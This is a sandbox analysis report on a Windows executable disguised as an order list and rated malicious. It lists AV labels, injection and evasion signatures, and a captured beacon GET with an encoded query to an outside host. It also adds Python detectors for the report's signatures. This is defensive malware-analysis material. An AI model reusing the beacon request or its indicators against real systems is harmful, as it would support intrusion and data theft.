
Analysis Report 42LIST OF ITEMS TO ORDER.exe

Overview

General Information

Joe Sandbox Version: 25.0.0 Tiger's Eye
Analysis ID: 109766
Start date: 11.02.2019
Start time: 17:33:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 17s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 42LIST OF ITEMS TO ORDER.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spyw.evad.winEXE@272/8@6/2
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 49.5% (good quality ratio 45.9%)
  • Quality average: 72.9%
  • Quality standard deviation: 30.4%
HCA Information:
  • Successful, ratio: 74%
  • Number of executed functions: 76
  • Number of non-executed functions: 346
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe, svchost.exe
  • Execution Graph export aborted for target 42LIST OF ITEMS TO ORDER.exe, PID 4176 because there are no executed functions
  • Execution Graph export aborted for target px7426l3fbx.exe, PID 552 because there are no executed functions
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold | Score: 100 | Range: 0 - 100 | Reporting: Report FP / FN | Whitelisted: false | Detection: malicious

Confidence

Strategy: Threshold | Score: 5 | Range: 0 - 5 | Further Analysis Required?: false


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox found no clickable buttons; additional UI automation would likely extend the observed behavior
Sample tries to load a library that is not present or installed on the analysis machine; adding the library might reveal more behavior
Some HTTP requests failed (404); the sample will likely exhibit less behavior than it would against a live server



Mitre Att&ck Matrix

One line per tactic. A number directly after a technique name is the signature-hit badge carried over from the original matrix (left as exported); techniques without a number were not matched by any signature and are the matrix's standard placeholders.

  • Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
  • Execution: Exploitation for Client Execution1; Service Execution; Windows Management Instrumentation; Scheduled Task; Command-Line Interface
  • Persistence: Hooking1; Registry Run Keys / Start Folder1; Accessibility Features; System Firmware; Shortcut Modification
  • Privilege Escalation: Hooking1; Process Injection711; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness
  • Defense Evasion: Rootkit1; Software Packing2; Disabling Security Tools1; Process Injection711; Obfuscated Files or Information2
  • Credential Access: Hooking1; Input Capture1; Credentials in Files1; Credentials in Files; Account Manipulation
  • Discovery: Process Discovery1; Security Software Discovery51; Remote System Discovery1; System Information Discovery22; Remote System Discovery
  • Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot
  • Collection: Input Capture1; Data from Local System1; Data from Network Shared Drive; Input Capture; Data Staged
  • Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer
  • Command and Control: Standard Cryptographic Protocol1; Standard Non-Application Layer Protocol3; Standard Application Layer Protocol3; Multiband Communication; Standard Cryptographic Protocol

Signature Overview



AV Detection:

Antivirus detection for unpacked file
Source: 0.2.42LIST OF ITEMS TO ORDER.exe.130000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 19.2.px7426l3fbx.exe.c10000.1.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 3.1.42LIST OF ITEMS TO ORDER.exe.c60000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 24.2.px7426l3fbx.exe.c10000.2.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 17.2.px7426l3fbx.exe.dc0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.2.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 20.2.px7426l3fbx.exe.430000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.1.42LIST OF ITEMS TO ORDER.exe.c60000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 18.2.px7426l3fbx.exe.c10000.1.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 23.1.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 23.0.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 3.2.42LIST OF ITEMS TO ORDER.exe.c60000.2.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 19.2.px7426l3fbx.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 23.2.px7426l3fbx.exe.1260000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 20.2.px7426l3fbx.exe.c10000.1.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 0.0.42LIST OF ITEMS TO ORDER.exe.c60000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 18.1.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 20.0.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 0.2.42LIST OF ITEMS TO ORDER.exe.c60000.1.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 24.1.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 24.2.px7426l3fbx.exe.710000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.42LIST OF ITEMS TO ORDER.exe.c60000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 3.2.42LIST OF ITEMS TO ORDER.exe.3c0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.1.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 20.1.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 24.0.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 17.0.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 17.2.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 19.0.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7
Source: 18.2.px7426l3fbx.exe.bd0000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.px7426l3fbx.exe.c10000.0.unpack | Avira: Label: ADWARE/Amonetize.Gen7

Reading the list as a whole: the ADWARE/Amonetize.Gen7 label sits on the region that is present in every dump of the sample (c60000) and of its dropped copy px7426l3fbx.exe (c10000), while the generic TR/Crypt.ZPACK.Gen hits land on other regions (130000, 3c0000, 400000, 430000, 710000, bd0000, dc0000, 1260000) that appear only in later dumps, which is what code unpacked into fresh memory at runtime looks like.

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 4x nop then pop edi | 3_2_003D4035
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi | 6_2_00C14047
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 4x nop then pop edi | 19_2_00414035

The same construct shows up in the original sample, in its dropped copy under Program Files (x86), and in cmmon32.exe, a Windows binary from SysWOW64; its presence there is consistent with the sample's code having been injected into that process (the report counts two injected processes above).
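The signature above keys on four or more consecutive single-byte nop instructions (0x90) immediately followed by pop edi (0x5F), a sequence compilers do not normally emit but hand-written decoders and shellcode often do. The scanner below is an added example, not Joe Sandbox's own implementation: it finds that pattern in a raw code buffer and reports hits in the report's wording. The sample buffer and the image base 0x400000 are constructed for the demonstration.

```python
"""Find runs of inlined NOPs that end in `pop edi`, the pattern behind the
"Found inlined nop instructions" signature.

Added example; not Joe Sandbox's implementation. SAMPLE_CODE and the image
base used below are constructed for the demonstration.
"""
import re
from typing import List, Tuple

NOP = 0x90      # single-byte x86 `nop`
POP_EDI = 0x5F  # x86 `pop edi`


def find_nop_pop_edi(code: bytes, min_nops: int = 4, base: int = 0) -> List[Tuple[int, int]]:
    """Return (address, nop_count) for each run of at least `min_nops` NOPs
    that is immediately followed by `pop edi`.

    `base` is added to buffer offsets so hits read like the sandbox's
    function addresses (e.g. 003D4035). Runs shorter than `min_nops` are
    treated as ordinary alignment padding and ignored.
    """
    pattern = re.compile(rb"(\x90{%d,})\x5f" % min_nops)
    return [(base + m.start(1), len(m.group(1))) for m in pattern.finditer(code)]


def describe_hits(hits: List[Tuple[int, int]]) -> List[str]:
    """Render hits in the report's own wording ("4x nop then pop edi")."""
    return ["%dx nop then pop edi at %08X" % (n, addr) for addr, n in hits]


# Constructed code buffer: one ordinary prologue, two hits, two near misses.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                          # push ebp; mov ebp, esp (normal prologue)
    + bytes([NOP]) * 4 + bytes([POP_EDI])    # 4x nop then pop edi -> hit at offset 3
    + b"\x33\xc0"                            # xor eax, eax
    + bytes([NOP]) * 2 + bytes([POP_EDI])    # only 2 nops: below the threshold
    + bytes([NOP]) * 6 + b"\xc3"             # 6 nops then ret: not followed by pop edi
    + bytes([NOP]) * 5 + bytes([POP_EDI])    # 5x nop then pop edi -> hit at offset 20
)

if __name__ == "__main__":
    for line in describe_hits(find_nop_pop_edi(SAMPLE_CODE, base=0x400000)):
        print(line)
```

Two practical caveats. A linear byte scan like this one can fire on 0x90 0x5F sequences that sit inside a multi-byte instruction; the sandbox evaluates the pattern on disassembled functions, which avoids that. And `min_nops` is the noise control: alignment padding of one to three nops in front of a jump target is common in compiled code, runs of four or more followed by a register pop are not.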

Networking:

HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
    GET /so/?MPiPvHW8=dOpA/OG/hqheaihrvPaoJbvP0lE4TJFGN1Rk5+M/Q95N9TRhGy6he8En90FysUAj5y1XhJXhjYo8OCnTjBz4&mJ=DtqL HTTP/1.1
    Host: www.antoniopignatiello.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (empty; the body is seven null bytes)
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 23.10.249.17
Social media urls found in memory data
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.facebook.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://www.facebook.com/favicon.ico
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: the same GET /so/?MPiPvHW8=... request to www.antoniopignatiello.com listed above (no User-Agent, Connection: close, seven-byte null body)
Found strings which match to known social media urls
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: svchost.exe, 0000000C.00000000.7228738149.00000223831D2000.00000004.sdmp | String found in binary or memory: .hotmail.com1&0 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000005.00000000.6546938513.0000000006930000.00000002.sdmp | String found in binary or memory: Free Hotmail.url equals www.hotmail.com (Hotmail)
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | String found in binary or memory: MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: svchost.exe, 0000000C.00000000.7228738149.00000223831D2000.00000004.sdmp | String found in binary or memory: hotmail.co.uk1 equals www.hotmail.com (Hotmail)
Source: svchost.exe, 0000000C.00000000.7228738149.00000223831D2000.00000004.sdmp | String found in binary or memory: hotmail.com1 equals www.hotmail.com (Hotmail)
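The "social media urls" signatures above and the "Urls found in memory or binary data" list that follows are string-carving results: printable runs are pulled out of each process memory dump, hostnames inside them are compared against a list of well-known sites, and the report prints the matching string together with the canonical host ("equals www.yahoo.com (Yahoo)"). The code below is an added example, not Joe Sandbox's, that reproduces that matching over a constructed memory blob which reuses strings shown in the report; KNOWN_SITES is a constructed short list limited to the brands the report matched.

```python
"""Match strings carved from a process memory dump against a list of
well-known web properties, as the "Found strings which match to known
social media urls" signature does.

Added example, not Joe Sandbox code. KNOWN_SITES is a constructed short list
(the report's own matches are Yahoo, Facebook, Myspace, Rambler, Hotmail);
SAMPLE_DUMP is a constructed blob that reuses strings shown in the report.
"""
import re
from typing import List, Tuple

# brand label -> (canonical host, display name), as the report prints them
KNOWN_SITES = {
    "yahoo": ("www.yahoo.com", "Yahoo"),
    "facebook": ("www.facebook.com", "Facebook"),
    "myspace": ("www.myspace.com", "Myspace"),
    "rambler": ("www.rambler.ru", "Rambler"),
    "hotmail": ("www.hotmail.com", "Hotmail"),
}

_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}")  # what `strings -n 6` would carve
_HOSTNAME = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


def carve_strings(blob: bytes) -> List[str]:
    """Printable ASCII runs of six or more characters, in dump order."""
    return [m.group(0).decode("ascii") for m in _PRINTABLE_RUN.finditer(blob)]


def hostnames_in(text: str) -> List[str]:
    """Dotted names inside a carved string, lower-cased. Trailing junk such as
    the '1' in 'hotmail.co.uk1' is excluded because the last label must be
    alphabetic, which is how the report still matched that string."""
    return [h.lower() for h in _HOSTNAME.findall(text)]


def match_known_sites(blob: bytes) -> List[Tuple[str, str, str]]:
    """(carved string, canonical host, display name) for each carved string
    containing a hostname one of whose DNS labels is a known brand.

    Matching on whole labels rather than substrings keeps a name such as
    'notyahoo.example' from matching Yahoo; 'br.search.yahoo.com' still does.
    """
    out: List[Tuple[str, str, str]] = []
    for s in carve_strings(blob):
        for host in hostnames_in(s):
            brand = next((label for label in host.split(".") if label in KNOWN_SITES), None)
            if brand is not None:
                canonical, name = KNOWN_SITES[brand]
                out.append((s, canonical, name))
                break  # one verdict per carved string, as in the report
    return out


# Constructed memory blob: report strings plus two negatives and one short run.
SAMPLE_DUMP = (
    b"\x00\x00<URL>http://br.search.yahoo.com/</URL>\x00\x00"
    b"<FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon>\x00"
    b"hotmail.co.uk1\x00\x00"
    b"http://notyahoo.example/\x00"                # substring trap: must not match
    b"http://ariadna.elmundo.es/favicon.ico\x00"   # real URL, not a known brand
    b"\x01\x02short\x03"                            # five characters: not carved
)

if __name__ == "__main__":
    for carved, canonical, name in match_known_sites(SAMPLE_DUMP):
        print("%s equals %s (%s)" % (carved, canonical, name))
```

Reading the report's hits with this in mind: the matches from explorer.exe are wrapped in <URL>, <FavoriteIcon> and <SuggestionsURL> tags, which are the elements of the search-provider (OpenSearch) descriptions Windows ships with, so they describe the injected host process rather than the sample's own contacts. The signature is informational; the request to www.antoniopignatiello.com in the HTTP section is the traffic that matters.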
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: www.appleconnect.info
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Mon, 11 Feb 2019 16:35:55 GMT
    Server: Apache
    X-Powered-By: PHP/5.4.45-0+deb7u2
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <http://www.antoniopignatiello.com/wp-json/>; rel="https://api.w.org/"
    Connection: close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
    Data Raw: 31 30 34 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72
    (The raw bytes decode to the chunk-size line "104c" followed by an HTML page starting <!DOCTYPE html><html lang="it-IT">; together with the Link header pointing at /wp-json/, this is the site's ordinary WordPress 404 page, not a reply from the requested /so/ route.)
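The two HTTP signatures in this section (a GET with no User-Agent header, and the 404 the server answered with) are both decided by parsing the captured exchange. The code below is an added example, not Joe Sandbox's, that parses a raw request and response and emits those findings; the sample messages are constructed to mirror the exchange shown above (same host, path and status), with the response headers trimmed and the body cut short, so they are not byte-exact copies of the capture.

```python
"""Check a captured HTTP exchange for the two traits the report flags:
a GET/POST that sends no User-Agent header, and a 404/503 reply.

Added example, not Joe Sandbox code. The request and response below are
constructed to mirror the exchange shown in the report (same host, path
and status); header set and truncated body are not byte-exact.
"""
from typing import Dict, List, Tuple


def parse_http_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP message into (start line, lower-cased header map, body).
    A capture with no blank line is treated as header-only."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def check_request(raw: bytes) -> List[str]:
    """Findings for one client request, worded like the report's signatures."""
    start, headers, body = parse_http_message(raw)
    method = start.split(" ", 1)[0].upper()
    findings: List[str] = []
    if method in ("GET", "POST") and "user-agent" not in headers:
        findings.append("HTTP %s without a user agent" % method)
    if method == "GET" and body:
        # Browsers do not send a body with GET; the captured request carries
        # seven null bytes after the headers.
        findings.append("GET with a %d-byte body" % len(body))
    if body and "content-length" not in headers and headers.get("transfer-encoding", "").lower() != "chunked":
        findings.append("body present but neither Content-Length nor chunked encoding")
    return findings


def check_response(raw: bytes) -> List[str]:
    """Findings for the server reply: 404/503 means the route does not exist or
    the server is unavailable, so the sample will show less behaviour."""
    start, _, _ = parse_http_message(raw)
    parts = start.split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    if status in (404, 503):
        reason = parts[2] if len(parts) > 2 else ""
        return ["non-existing http route (HTTP/1.1 %d %s)" % (status, reason)]
    return []


# Constructed messages mirroring the captured exchange.
SAMPLE_REQUEST = (
    b"GET /so/?MPiPvHW8=dOpA/OG/hqheaihrvPaoJbvP0lE4TJFGN1Rk5+M/Q95N9TRhGy6he8En90FysUAj5y1XhJXhjYo8OCnTjBz4&mJ=DtqL HTTP/1.1\r\n"
    b"Host: www.antoniopignatiello.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Date: Mon, 11 Feb 2019 16:35:55 GMT\r\n"
    b"Server: Apache\r\n"
    b"Connection: close\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"104c\r\n<!DOCTYPE html>\n<html lang=\"it-IT\">\n"
)
# A browser-style request to the same host, for contrast: no findings.
BROWSER_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: www.antoniopignatiello.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for finding in check_request(SAMPLE_REQUEST) + check_response(SAMPLE_RESPONSE):
        print(finding)
```

The third check is the one worth keeping in a hunting rule: a request that carries a body but declares neither Content-Length nor chunked encoding is malformed by RFC 7230, and legitimate HTTP libraries do not produce it, so it separates hand-rolled beacons from ordinary clients better than the missing User-Agent alone (which scripts and updaters also omit).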
Urls found in memory or binary data
Source: explorer.exe, 00000005.00000000.6546938513.0000000006930000.00000002.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6546938513.0000000006930000.00000002.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: svchost.exe, 0000000C.00000002.7787928509.0000022387A50000.00000002.sdmp | String found in binary or memory: http://blogs.technet.com/b/ime/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
